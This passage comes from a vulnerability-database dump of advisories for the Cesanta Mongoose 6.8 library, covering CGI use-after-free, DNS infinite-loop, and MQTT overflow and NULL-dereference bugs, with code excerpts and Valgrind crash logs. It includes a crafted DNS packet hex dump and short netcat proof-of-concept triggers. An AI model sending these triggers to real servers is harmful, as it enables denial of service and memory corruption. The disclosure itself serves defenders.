0x4020C2: main (simplest_web_server.c:33)\r\n==87342== Block was alloc'd at\r\n==87342== at 0x4C2FB55: calloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\r\n==87342== by 0x4078F2: mg_create_connection_base (mongoose.c:2303)\r\n==87342== by 0x4079DC: mg_create_connection (mongoose.c:2328)\r\n==87342== by 0x407D45: mg_if_accept_new_conn (mongoose.c:2435)\r\n==87342== by 0x409A9F: mg_accept_conn (mongoose.c:3202)\r\n==87342== by 0x40A35C: mg_mgr_handle_conn (mongoose.c:3495)\r\n==87342== by 0x40ADA9: mg_socket_if_poll (mongoose.c:3690)\r\n==87342== by 0x407729: mg_mgr_poll (mongoose.c:2232)\r\n==87342== by 0x4020C2: main (simplest_web_server.c:33)\r\n==87342== \r\n==87342== Invalid write of size 8\r\n==87342== at 0x413905: mg_cgi_ev_handler (mongoose.c:8250)\r\n==87342== by 0x406FD9: mg_call (mongoose.c:2051)\r\n==87342== by 0x407318: mg_close_conn (mongoose.c:2108)\r\n==87342== by 0x40AE38: mg_socket_if_poll (mongoose.c:3697)\r\n==87342== by 0x407729: mg_mgr_poll (mongoose.c:2232)\r\n==87342== by 0x4020C2: main (simplest_web_server.c:33)\r\n==87342== Address 0x5421768 is 200 bytes inside a block of size 208 free'd\r\n==87342== at 0x4C2EDEB: free (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\r\n==87342== by 0x407289: mg_destroy_conn (mongoose.c:2101)\r\n==87342== by 0x407329: mg_close_conn (mongoose.c:2109)\r\n==87342== by 0x40AE38: mg_socket_if_poll (mongoose.c:3697)\r\n==87342== by 0x407729: mg_mgr_poll (mongoose.c:2232)\r\n==87342== by 0x4020C2: main (simplest_web_server.c:33)\r\n==87342== Block was alloc'd at\r\n==87342== at 0x4C2FB55: calloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\r\n==87342== by 0x4078F2: mg_create_connection_base (mongoose.c:2303)\r\n==87342== by 0x4079DC: mg_create_connection (mongoose.c:2328)\r\n==87342== by 0x407D45: mg_if_accept_new_conn (mongoose.c:2435)\r\n==87342== by 0x409A9F: mg_accept_conn (mongoose.c:3202)\r\n==87342== by 0x40A35C: mg_mgr_handle_conn (mongoose.c:3495)\r\n==87342== by 0x40ADA9: mg_socket_if_poll (mongoose.c:3690)\r\n==87342== by 0x407729: mg_mgr_poll (mongoose.c:2232)\r\n==87342== by 0x4020C2: main (simplest_web_server.c:33)\r\n==87342== \r\n==87355== \r\n==87355== HEAP SUMMARY:\r\n==87355== in use at exit: 1,656 bytes in 9 blocks\r\n==87355== total heap usage: 11 allocs, 2 frees, 3,704 bytes allocated\r\n==87355== \r\n==87355== LEAK SUMMARY:\r\n==87355== definitely lost: 0 bytes in 0 blocks\r\n==87355== indirectly lost: 0 bytes in 0 blocks\r\n==87355== possibly lost: 0 bytes in 0 blocks\r\n==87355== still reachable: 1,656 bytes in 9 blocks\r\n==87355== suppressed: 0 bytes in 0 blocks\r\n==87355== Rerun with --leak-check=full to see details of leaked memory\r\n==87355== \r\n==87355== For counts of detected and suppressed errors, rerun with: -v\r\n==87355== ERROR SUMMARY: 0 errors from 0 contexts (suppressed: 0 from 0)\r\n==87342== \r\n==87342== Process terminating with default action of signal 2 (SIGINT)\r\n==87342== at 0x5154573: __select_nocancel (syscall-template.S:84)\r\n==87342== by 0x40AB75: mg_socket_if_poll (mongoose.c:3657)\r\n==87342== by 0x407729: mg_mgr_poll (mongoose.c:2232)\r\n==87342== by 0x4020C2: main (simplest_web_server.c:33)\r\n==87342== \r\n==87342== HEAP SUMMARY:\r\n==87342== in use at exit: 416 bytes in 6 blocks\r\n==87342== total heap usage: 14 allocs, 8 frees, 5,008 bytes allocated\r\n==87342== \r\n==87342== LEAK SUMMARY:\r\n==87342== definitely lost: 72 bytes in 1 blocks\r\n==87342== indirectly lost: 0 bytes in 0 blocks\r\n==87342== possibly lost: 0 bytes in 0 blocks\r\n==87342== still reachable: 344 bytes in 5 blocks\r\n==87342== suppressed: 0 bytes in 0 blocks\r\n==87342== Rerun with --leak-check=full to see details of leaked memory\r\n==87342== \r\n==87342== For counts of detected and suppressed errors, rerun with: -v\r\n==87342== ERROR SUMMARY: 6 errors from 6 contexts (suppressed: 0 from 0)\r\n```\r\n\r\n### Timeline\r\n* 2017-08-30 - Vendor Disclosure\r\n* 2017-10-31 - Public Release", "cvss3": {}, "published": "2017-11-09T00:00:00", "type": "seebug", "title": "Cesanta Mongoose HTTP Server CGI Remote Code Execcution Vulnerability(CVE-2017-2891)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-2891"], "modified": "2017-11-09T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96834", "id": "SSV:96834", "sourceData": "\n echo -ne \"POST /a.cgi HTTP/1.1\\r\\n\\r\\n\"| nc localhost 8000\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-96834", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-11-19T13:05:45", "description": "### Summary\r\nAn infinite loop programming error exists in the DNS server functionality of Cesanta Mongoose 6.8 library. A specially crafted DNS request can cause an infinite loop resulting in high CPU usage and Denial Of Service. An attacker can send a packet over network to trigger this vulnerability.\r\n\r\n### Tested Versions\r\nCesanta Mongoose 6.8\r\n\r\n### Product URLs\r\nhttps://cesanta.com/\r\n\r\n### CVSSv3 Score\r\n7.5 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\r\n\r\n### CWE\r\nCWE-835: Loop with Unreachable Exit Condition ('Infinite Loop')\r\n\r\n### Details\r\nMongoose is a monolithic library implementing a number of networking protocols, including HTTP, MQTT, DNS and others. It is designed with embedded devices in mind and as such is used in many IoT devices and runs on virtually all platforms.\r\n\r\nIn a DNS request packet, a name can be compressed to save space. The compression in question relies on pointers to parts of the domain name already present in the packet. When decompressing the names, the DNS server software must look up those pointers and substitute them accordingly.\r\n\r\nIn the Mongoose library, the function `mg_dns_uncompress_name` is responsible for decompressing names and a special case for pointers is handled:\r\n```\r\nwhile ((chunk_len = *data++)) { [3]\r\n int leeway = dst_len - (dst - old_dst);\r\n if (data >= end) \r\n return 0;\r\n\r\n\r\n if (chunk_len & 0xc0) { [1]\r\n uint16_t off = (data[-1] & (~0xc0)) << 8 | data[0];\r\n if (off >= msg->pkt.len) {\r\n return 0;\r\n\r\n data = (unsigned char *) msg->pkt.p + off; [2]\r\n continue;\r\n```\r\n\r\nThe name chunk pointer is encoded in a single byte having 2 most significant bits set (0xc0) and rest are an offset to the actual name. In the above code, at [1], a check is performed to see if the current chunk is actually a pointer, and if so, the offset is extracted instead. At [2], this offset is used to advance the parser by adding it to start of the packet. The loop then continues at [3].\r\n\r\nIn the above code, no check is performed to see if the calculated offset refers to the same position, or if the pointer points to another pointer. No valid DNS query should have a pointer pointing to another pointer and precisely that kind packet will cause an infinite loop in the above code. An example packet:\r\n```\r\n00000000: 0020 a577 0120 0001 0000 0000 0001 c00c . .w. ..........\r\n00000010: 0000 0000 0100 0100 0029 1000 0000 0000 .........)......\r\n00000020: 0000 0a \u2026\r\n```\r\n\r\nAt offset 14 above, we have a start of name chunk, which specifies a pointer (0xc0), followed by 0x0c which represents it\u2019s offset from the start of the packet, past the 2 ID bytes. When parsing this packet, function `mg_dns_uncompress_name` will enter an infinite loop, because the first chunk points to itself.\r\n\r\nThis causes 100% CPU usage and Denial Of Service.\r\n\r\n### Timeline\r\n* 2017-08-30 - Vendor Disclosure\r\n* 2017-10-31 - Public Release", "cvss3": {}, "published": "2017-11-09T00:00:00", "type": "seebug", "title": "Cesanta Mongoose DNS Query Compressed Name Pointer Denial Of Service(CVE-2017-2909)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-2909"], "modified": "2017-11-09T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96831", "id": "SSV:96831", "sourceData": "", "sourceHref": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-11-19T12:04:38", "description": "### Summary\r\nAn exploitable arbitrary memory read vulnerability exists in the MQTT packet parsing functionality of Cesanta Mongoose 6.8. A specially crafted MQTT packet can cause an arbitrary out-of-bounds memory read and write potentially resulting in information disclosure, denial of service and remote code execution. An attacker needs to send a specially crafted MQTT packet over network to trigger this vulnerability.\r\n\r\n### Tested Versions\r\nCesanta Mongoose 6.8\r\n\r\n### Product URLs\r\nhttps://cesanta.com/\r\n\r\n### CVSSv3 Score\r\n9.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\r\n\r\n### CWE\r\nCWE-190: Integer Overflow or Wraparound\r\n\r\n### Details\r\nMongoose is a monolithic library implementing a number of networking protocols, including HTTP, MQTT, MDNS and others. It is designed with embedded devices in mind and as such is used in many IoT devices and runs on virtually all platforms.\r\n\r\nWhile parsing an MQTT packet with variable length header no check is performed to assure the calculated payload length corresponds to the actual received packet. An arbitrary length is used in pointer arithmetic leading to arbitrary memory access. Variable payload length in mqtt packet is encoded by 7 bit fields with 8th bit in a byte being used as continuation bit. The following code from the `parse_mqtt` function decodes this:\r\n```\r\n /* decode mqtt variable length */\r\n do \r\n\r\n\r\n len += (*p & 127) << 7 * (p - &io->buf[1]);\r\n while ((*p++ & 128) != 0 && ((size_t)(p - io->buf) <= io->len));\r\n```\r\n\r\nIn the above code, no check is performed on the calculated `len` value which can be arbitrarily large. By the MQTT standard, the largest MQTT packet can be at most 256 megabytes. Further, a following check is performed:\r\n```\r\nend = p + len;\r\nif (end > io->buf + io->len + 1) \r\n return -1;\r\n```\r\n\r\nIn the above code, `end` should point to the end of message, and the `if` tries to check if it\u2019s in bounds of the buffer, but since the check is comparing pointers, an integer overflow can cause `end` to wrap around and point before the start of message buffer, while still having huge `len` value calculated before.\r\n\r\nThis can cause further memory corruption down the line when actually handling the commands sent in the packet. For example, this can be exploited by sending a \u201cPUBLISH\u201d command, which ends up notifying all the clients subscribed to a certain topic. Still in the `parse_mqtt` function we see:\r\n```\r\n case MG_MQTT_CMD_PUBLISH: {\r\n if (MG_MQTT_GET_QOS(header) > 0) \r\n mm->message_id = getu16(p);\r\n p += 2;\r\n\r\n p = scanto(p, &mm->topic);\r\n\r\n mm->payload.p = p;\r\n mm->payload.len = end - p;\r\n break;\r\n```\r\n\r\nThe above code deals with the \u201cPUBLISH\u201d command and uses the `end` pointer and `p` to calculate the length, due to the previous integer overflow , `end` can point to before `p` leading to a large `payload.len` value which is later used when sending the notification to subscribed clients.\r\n\r\nWith precise memory layout control, this can be abused to cause an arbitrary write which could lead to remote code execution. On the other hand, there is a potential to abuse this vulnerability to leak large amount of data from the process as the overflown value is used when sending data to clients. The vulnerability can be triggered by sending the supplied proof of concept packet to sample `mqtt_broker` application supplied with the library. It should be noted that depending on memory layout, the proof of concept packet might not crash the application, but it does trigger the bug.\r\n\r\n### Crash Information\r\n```\r\n Valgrind output:\r\n==118470== Memcheck, a memory error detector\r\n==118470== Copyright (C) 2002-2015, and GNU GPL'd, by Julian Seward et al.\r\n==118470== Using Valgrind-3.11.0 and LibVEX; rerun with -h for copyright info\r\n==118470== Command: ../../../vanilla/mongoose/examples/mqtt_broker/mqtt_broker\r\n==118470== \r\nMQTT broker started on 0.0.0.0:8113\r\nffff==118470== Invalid read of size 1\r\n==118470== at 0x4C3236C: memcpy@GLIBC_2.2.5 (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\r\n==118470== by 0x403E95: mbuf_insert (mongoose.c:1073)\r\n==118470== by 0x40EB8D: mg_mqtt_prepend_header (mongoose.c:9824)\r\n==118470== by 0x40ECCA: mg_mqtt_publish (mongoose.c:9843)\r\n==118470== by 0x40F9A2: mg_mqtt_broker_handle_publish (mongoose.c:10104)\r\n==118470== by 0x40FAF4: mg_mqtt_broker (mongoose.c:10136)\r\n==118470== by 0x40E648: mqtt_handler (mongoose.c:9712)\r\n==118470== by 0x4071B6: mg_call (mongoose.c:2051)\r\n==118470== by 0x408362: mg_recv_common (mongoose.c:2505)\r\n==118470== by 0x408393: mg_if_recv_tcp_cb (mongoose.c:2509)\r\n==118470== by 0x40A712: mg_handle_tcp_read (mongoose.c:3376)\r\n==118470== by 0x40AC8A: mg_mgr_handle_conn (mongoose.c:3501)\r\n==118470== Address 0x5ce0796 is 6 bytes inside a block of size 10 free'd\r\n==118470== at 0x4C2EDEB: free (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\r\n==118470== by 0x4C2FDB7: realloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\r\n==118470== by 0x403F74: mbuf_insert (mongoose.c:1080)\r\n==118470== by 0x404055: mbuf_append (mongoose.c:1096)\r\n==118470== by 0x409E83: mg_socket_if_tcp_send (mongoose.c:3167)\r\n==118470== by 0x408158: mg_send (mongoose.c:2463)\r\n==118470== by 0x40ECA4: mg_mqtt_publish (mongoose.c:9841)\r\n==118470== by 0x40F9A2: mg_mqtt_broker_handle_publish (mongoose.c:10104)\r\n==118470== by 0x40FAF4: mg_mqtt_broker (mongoose.c:10136)\r\n==118470== by 0x40E648: mqtt_handler (mongoose.c:9712)\r\n==118470== by 0x4071B6: mg_call (mongoose.c:2051)\r\n==118470== by 0x408362: mg_recv_common (mongoose.c:2505)\r\n==118470== Block was alloc'd at\r\n==118470== at 0x4C2FD5F: realloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\r\n==118470== by 0x403F74: mbuf_insert (mongoose.c:1080)\r\n==118470== by 0x404055: mbuf_append (mongoose.c:1096)\r\n==118470== by 0x409E83: mg_socket_if_tcp_send (mongoose.c:3167)\r\n==118470== by 0x408158: mg_send (mongoose.c:2463)\r\n==118470== by 0x40EC51: mg_mqtt_publish (mongoose.c:9836)\r\n==118470== by 0x40F9A2: mg_mqtt_broker_handle_publish (mongoose.c:10104)\r\n==118470== by 0x40FAF4: mg_mqtt_broker (mongoose.c:10136)\r\n==118470== by 0x40E648: mqtt_handler (mongoose.c:9712)\r\n==118470== by 0x4071B6: mg_call (mongoose.c:2051)\r\n==118470== by 0x408362: mg_recv_common (mongoose.c:2505)\r\n==118470== by 0x408393: mg_if_recv_tcp_cb (mongoose.c:2509)\r\n==118470== \r\n==118470== Invalid write of size 1\r\n==118470== at 0x4C32372: memcpy@GLIBC_2.2.5 (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\r\n==118470== by 0x403E95: mbuf_insert (mongoose.c:1073)\r\n==118470== by 0x40EB8D: mg_mqtt_prepend_header (mongoose.c:9824)\r\n==118470== by 0x40ECCA: mg_mqtt_publish (mongoose.c:9843)\r\n==118470== by 0x40F9A2: mg_mqtt_broker_handle_publish (mongoose.c:10104)\r\n==118470== by 0x40FAF4: mg_mqtt_broker (mongoose.c:10136)\r\n==118470== by 0x40E648: mqtt_handler (mongoose.c:9712)\r\n==118470== by 0x4071B6: mg_call (mongoose.c:2051)\r\n==118470== by 0x408362: mg_recv_common (mongoose.c:2505)\r\n==118470== by 0x408393: mg_if_recv_tcp_cb (mongoose.c:2509)\r\n==118470== by 0x40A712: mg_handle_tcp_read (mongoose.c:3376)\r\n==118470== by 0x40AC8A: mg_mgr_handle_conn (mongoose.c:3501)\r\n==118470== Address 0x5ce0798 is 8 bytes inside a block of size 10 free'd\r\n==118470== at 0x4C2EDEB: free (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\r\n==118470== by 0x4C2FDB7: realloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\r\n==118470== by 0x403F74: mbuf_insert (mongoose.c:1080)\r\n==118470== by 0x404055: mbuf_append (mongoose.c:1096)\r\n==118470== by 0x409E83: mg_socket_if_tcp_send (mongoose.c:3167)\r\n==118470== by 0x408158: mg_send (mongoose.c:2463)\r\n==118470== by 0x40ECA4: mg_mqtt_publish (mongoose.c:9841)\r\n==118470== by 0x40F9A2: mg_mqtt_broker_handle_publish (mongoose.c:10104)\r\n==118470== by 0x40FAF4: mg_mqtt_broker (mongoose.c:10136)\r\n==118470== by 0x40E648: mqtt_handler (mongoose.c:9712)\r\n==118470== by 0x4071B6: mg_call (mongoose.c:2051)\r\n==118470== by 0x408362: mg_recv_common (mongoose.c:2505)\r\n==118470== Block was alloc'd at\r\n==118470== at 0x4C2FD5F: realloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\r\n==118470== by 0x403F74: mbuf_insert (mongoose.c:1080)\r\n==118470== by 0x404055: mbuf_append (mongoose.c:1096)\r\n==118470== by 0x409E83: mg_socket_if_tcp_send (mongoose.c:3167)\r\n==118470== by 0x408158: mg_send (mongoose.c:2463)\r\n==118470== by 0x40EC51: mg_mqtt_publish (mongoose.c:9836)\r\n==118470== by 0x40F9A2: mg_mqtt_broker_handle_publish (mongoose.c:10104)\r\n==118470== by 0x40FAF4: mg_mqtt_broker (mongoose.c:10136)\r\n==118470== by 0x40E648: mqtt_handler (mongoose.c:9712)\r\n==118470== by 0x4071B6: mg_call (mongoose.c:2051)\r\n==118470== by 0x408362: mg_recv_common (mongoose.c:2505)\r\n==118470== by 0x408393: mg_if_recv_tcp_cb (mongoose.c:2509)\r\n==118470== \r\n==118470== Invalid write of size 2\r\n==118470== at 0x4C32723: memcpy@@GLIBC_2.14 (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\r\n==118470== by 0x403EBE: mbuf_insert (mongoose.c:1075)\r\n==118470== by 0x40EB8D: mg_mqtt_prepend_header (mongoose.c:9824)\r\n==118470== by 0x40ECCA: mg_mqtt_publish (mongoose.c:9843)\r\n==118470== by 0x40F9A2: mg_mqtt_broker_handle_publish (mongoose.c:10104)\r\n==118470== by 0x40FAF4: mg_mqtt_broker (mongoose.c:10136)\r\n==118470== by 0x40E648: mqtt_handler (mongoose.c:9712)\r\n==118470== by 0x4071B6: mg_call (mongoose.c:2051)\r\n==118470== by 0x408362: mg_recv_common (mongoose.c:2505)\r\n==118470== by 0x408393: mg_if_recv_tcp_cb (mongoose.c:2509)\r\n==118470== by 0x40A712: mg_handle_tcp_read (mongoose.c:3376)\r\n==118470== by 0x40AC8A: mg_mgr_handle_conn (mongoose.c:3501)\r\n==118470== Address 0x5ce0790 is 0 bytes inside a block of size 10 free'd\r\n==118470== at 0x4C2EDEB: free (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\r\n==118470== by 0x4C2FDB7: realloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\r\n==118470== by 0x403F74: mbuf_insert (mongoose.c:1080)\r\n==118470== by 0x404055: mbuf_append (mongoose.c:1096)\r\n==118470== by 0x409E83: mg_socket_if_tcp_send (mongoose.c:3167)\r\n==118470== by 0x408158: mg_send (mongoose.c:2463)\r\n==118470== by 0x40ECA4: mg_mqtt_publish (mongoose.c:9841)\r\n==118470== by 0x40F9A2: mg_mqtt_broker_handle_publish (mongoose.c:10104)\r\n==118470== by 0x40FAF4: mg_mqtt_broker (mongoose.c:10136)\r\n==118470== by 0x40E648: mqtt_handler (mongoose.c:9712)\r\n==118470== by 0x4071B6: mg_call (mongoose.c:2051)\r\n==118470== by 0x408362: mg_recv_common (mongoose.c:2505)\r\n==118470== Block was alloc'd at\r\n==118470== at 0x4C2FD5F: realloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\r\n==118470== by 0x403F74: mbuf_insert (mongoose.c:1080)\r\n==118470== by 0x404055: mbuf_append (mongoose.c:1096)\r\n==118470== by 0x409E83: mg_socket_if_tcp_send (mongoose.c:3167)\r\n==118470== by 0x408158: mg_send (mongoose.c:2463)\r\n==118470== by 0x40EC51: mg_mqtt_publish (mongoose.c:9836)\r\n==118470== by 0x40F9A2: mg_mqtt_broker_handle_publish (mongoose.c:10104)\r\n==118470== by 0x40FAF4: mg_mqtt_broker (mongoose.c:10136)\r\n==118470== by 0x40E648: mqtt_handler (mongoose.c:9712)\r\n==118470== by 0x4071B6: mg_call (mongoose.c:2051)\r\n==118470== by 0x408362: mg_recv_common (mongoose.c:2505)\r\n==118470== by 0x408393: mg_if_recv_tcp_cb (mongoose.c:2509)\r\n==118470== \r\n==118470== Syscall param socketcall.sendto(msg) points to unaddressable byte(s)\r\n==118470== at 0x54F799D: send (send.c:26)\r\n==118470== by 0x40A40E: mg_write_to_socket (mongoose.c:3316)\r\n==118470== by 0x40ACC2: mg_mgr_handle_conn (mongoose.c:3508)\r\n==118470== by 0x40B6C9: mg_socket_if_poll (mongoose.c:3694)\r\n==118470== by 0x407935: mg_mgr_poll (mongoose.c:2232)\r\n==118470== by 0x4022A6: main (mqtt_broker.c:43)\r\n==118470== Address 0x5ce0790 is 0 bytes inside a block of size 10 free'd\r\n==118470== at 0x4C2EDEB: free (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\r\n==118470== by 0x4C2FDB7: realloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\r\n==118470== by 0x403F74: mbuf_insert (mongoose.c:1080)\r\n==118470== by 0x404055: mbuf_append (mongoose.c:1096)\r\n==118470== by 0x409E83: mg_socket_if_tcp_send (mongoose.c:3167)\r\n==118470== by 0x408158: mg_send (mongoose.c:2463)\r\n==118470== by 0x40ECA4: mg_mqtt_publish (mongoose.c:9841)\r\n==118470== by 0x40F9A2: mg_mqtt_broker_handle_publish (mongoose.c:10104)\r\n==118470== by 0x40FAF4: mg_mqtt_broker (mongoose.c:10136)\r\n==118470== by 0x40E648: mqtt_handler (mongoose.c:9712)\r\n==118470== by 0x4071B6: mg_call (mongoose.c:2051)\r\n==118470== by 0x408362: mg_recv_common (mongoose.c:2505)\r\n==118470== Block was alloc'd at\r\n==118470== at 0x4C2FD5F: realloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\r\n==118470== by 0x403F74: mbuf_insert (mongoose.c:1080)\r\n==118470== by 0x404055: mbuf_append (mongoose.c:1096)\r\n==118470== by 0x409E83: mg_socket_if_tcp_send (mongoose.c:3167)\r\n==118470== by 0x408158: mg_send (mongoose.c:2463)\r\n==118470== by 0x40EC51: mg_mqtt_publish (mongoose.c:9836)\r\n==118470== by 0x40F9A2: mg_mqtt_broker_handle_publish (mongoose.c:10104)\r\n==118470== by 0x40FAF4: mg_mqtt_broker (mongoose.c:10136)\r\n==118470== by 0x40E648: mqtt_handler (mongoose.c:9712)\r\n==118470== by 0x4071B6: mg_call (mongoose.c:2051)\r\n==118470== by 0x408362: mg_recv_common (mongoose.c:2505)\r\n==118470== by 0x408393: mg_if_recv_tcp_cb (mongoose.c:2509)\r\n```\r\n\r\n### Timeline\r\n* 2017-08-30 - Vendor Disclosure\r\n* 2017-10-31 - Public Release", "cvss3": {}, "published": "2017-11-09T00:00:00", "type": "seebug", "title": "Cesanta Mongoose MQTT Payload Length Remote Code Execution(CVE-2017-2892)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-2892"], "modified": "2017-11-09T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96835", "id": "SSV:96835", "sourceData": "", "sourceHref": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-11-19T11:55:38", "description": "### Summary\r\nAn exploitable NULL pointer dereference vulnerability exists in the MQTT packet parsing functionality of Cesanta Mongoose 6.8. An MQTT SUBSCRIBE packet can cause a NULL pointer dereference leading to server crash and denial of service. An attacker needs to send a specially crafted MQTT packet over the network to trigger this vulnerability.\r\n\r\n### Tested Versions\r\nCesanta Mongoose 6.8\r\n\r\n### Product URLs\r\nhttps://cesanta.com/\r\n\r\n### CVSSv3 Score\r\n7.5 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\r\n\r\n### CWE\r\nCWE-476: NULL Pointer Dereference\r\n\r\n### Details\r\nMongoose is a monolithic library implementing a number of networking protocols, including HTTP, MQTT, MDNS and others. It is designed with embedded devices in mind and as such is used in many IoT devices and runs on virtually all platforms.\r\n\r\nIn the MQTT protocol, a client initiates the connection by sending a CONNECT command, to which a server replies with CONNACK and then client proceeds with other commands. In the case of the mongoose MQTT server, if an out of order SUBSCRIBE packet is received by the server certain uninitialized structures are accessed which can lead to NULL pointer dereference and server crash. Specifically, in the function `mg_mqtt_broker_handle_subscribe` :\r\n```\r\nstruct mg_mqtt_session *ss = (struct mg_mqtt_session *) nc->user_data; [1]\r\nuint8_t qoss[512];\r\nsize_t qoss_len = 0;\r\n struct mg_str topic;\r\n uint8_t qos;\r\n int pos;\r\n struct mg_mqtt_topic_expression *te;\r\n\r\n or (pos = 0;\r\n (pos = mg_mqtt_next_subscribe_topic(msg, &topic, &qos, pos)) != -1;) {\r\n qoss[qoss_len++] = qos;\r\n\r\n\r\n ss->subscriptions = (struct mg_mqtt_topic_expression *) realloc(\r\n ss->subscriptions, sizeof(*ss->subscriptions) * qoss_len); [2]\r\n```\r\n\r\nIn the above code, at [1] we see `ss` being initialized to point to `nc->user_data` which can be null. At [2] `ss` pointer is dereferenced to access the `subscriptions` field which causes a NULL pointer dereference and leads to a server crash. This vulnerability can be triggered by sending bytes from the proof of concept to the sample `mqtt_broker` application supplied with the library.\r\n\r\n### Crash Information\r\n```\r\nValgrind output:\r\n\r\n\r\n==119048== Invalid read of size 8\r\n==119048== at 0x40F696: mg_mqtt_broker_handle_subscribe (mongoose.c:10050)\r\n==119048== by 0x40FADF: mg_mqtt_broker (mongoose.c:10133)\r\n==119048== by 0x40E648: mqtt_handler (mongoose.c:9712)\r\n==119048== by 0x4071B6: mg_call (mongoose.c:2051)\r\n==119048== by 0x408362: mg_recv_common (mongoose.c:2505)\r\n==119048== by 0x408393: mg_if_recv_tcp_cb (mongoose.c:2509)\r\n==119048== by 0x40A712: mg_handle_tcp_read (mongoose.c:3376)\r\n==119048== by 0x40AC8A: mg_mgr_handle_conn (mongoose.c:3501)\r\n==119048== by 0x40B6C9: mg_socket_if_poll (mongoose.c:3694)\r\n==119048== by 0x407935: mg_mgr_poll (mongoose.c:2232)\r\n==119048== by 0x4022A6: main (mqtt_broker.c:43)\r\n==119048== Address 0x30 is not stack'd, malloc'd or (recently) free'd\r\n==119048==\r\n==119048==\r\n==119048== Process terminating with default action of signal 11 (SIGSEGV): dumping core\r\n==119048== Access not within mapped region at address 0x30\r\n==119048== at 0x40F696: mg_mqtt_broker_handle_subscribe (mongoose.c:10050)\r\n==119048== by 0x40FADF: mg_mqtt_broker (mongoose.c:10133)\r\n==119048== by 0x40E648: mqtt_handler (mongoose.c:9712)\r\n==119048== by 0x4071B6: mg_call (mongoose.c:2051)\r\n==119048== by 0x408362: mg_recv_common (mongoose.c:2505)\r\n==119048== by 0x408393: mg_if_recv_tcp_cb (mongoose.c:2509)\r\n==119048== by 0x40A712: mg_handle_tcp_read (mongoose.c:3376)\r\n==119048== by 0x40AC8A: mg_mgr_handle_conn (mongoose.c:3501)\r\n==119048== by 0x40B6C9: mg_socket_if_poll (mongoose.c:3694)\r\n==119048== by 0x407935: mg_mgr_poll (mongoose.c:2232)\r\n==119048== by 0x4022A6: main (mqtt_broker.c:43)\r\n==119048== If you believe this happened as a result of a stack\r\n==119048== overflow in your program's main thread (unlikely but\r\n==119048== possible), you can try to increase the size of the\r\n==119048== main thread stack using the --main-stacksize= flag.\r\n==119048== The main thread stack size used in this run was 8388608.\r\n==119048==\r\n==119048== HEAP SUMMARY:\r\n==119048== in use at exit: 5,698 bytes in 154 blocks\r\n==119048== total heap usage: 159 allocs, 5 frees, 7,154 bytes allocated\r\n==119048==\r\n==119048== LEAK SUMMARY:\r\n==119048== definitely lost: 0 bytes in 0 blocks\r\n==119048== indirectly lost: 0 bytes in 0 blocks\r\n==119048== possibly lost: 0 bytes in 0 blocks\r\n==119048== still reachable: 5,698 bytes in 154 blocks\r\n==119048== suppressed: 0 bytes in 0 blocks\r\n==119048== Rerun with --leak-check=full to see details of leaked memory\r\n==119048==\r\n==119048== For counts of detected and suppressed errors, rerun with: -v\r\n==119048== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0)\r\nSegmentation fault\r\n```\r\n\r\n### Timeline\r\n* 2017-08-30 - Vendor Disclosure\r\n* 2017-10-31 - Public Release", "cvss3": {}, "published": "2017-11-08T00:00:00", "type": "seebug", "title": "Cesanta Mongoose MQTT SUBSCRIBE Command Denial Of Service(CVE-2017-2893)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-2893"], "modified": "2017-11-08T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96809", "id": "SSV:96809", "sourceData": "\n perl -e 'print \"\\x80\\x86\\x00\\x00AAAA\"' | nc\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-96809", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-11-19T11:55:48", "description": "### Summary\r\nAn exploitable arbitrary memory read vulnerability exists in the MQTT packet parsing functionality of Cesanta Mongoose 6.8. A specially crafted MQTT SUBSCRIBE packet can cause an arbitrary out-of=bounds memory read potentially resulting in information disclosure and denial of service. An attacker needs to send a specially crafted MQTT packet over the network to trigger this vulnerability.\r\n\r\n### Tested Versions\r\nCesanta Mongoose 6.8\r\n\r\n### Product URLs\r\nhttps://cesanta.com/\r\n\r\n### CVSSv3 Score\r\n8.2 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H\r\n\r\n### CWE\r\nCWE-190: Integer Overflow or Wraparound\r\n\r\n### Details\r\nMongoose is a monolithic library implementing a number of networking protocols, including HTTP, MQTT, MDNS and others. It is designed with embedded devices in mind and as such is used in many IoT devices and runs on virtually all platforms.\r\n\r\nWhile parsing an MQTT packet SUBSCRIBE command, topic string size as encoded in the packet is trusted without any additional validation. This 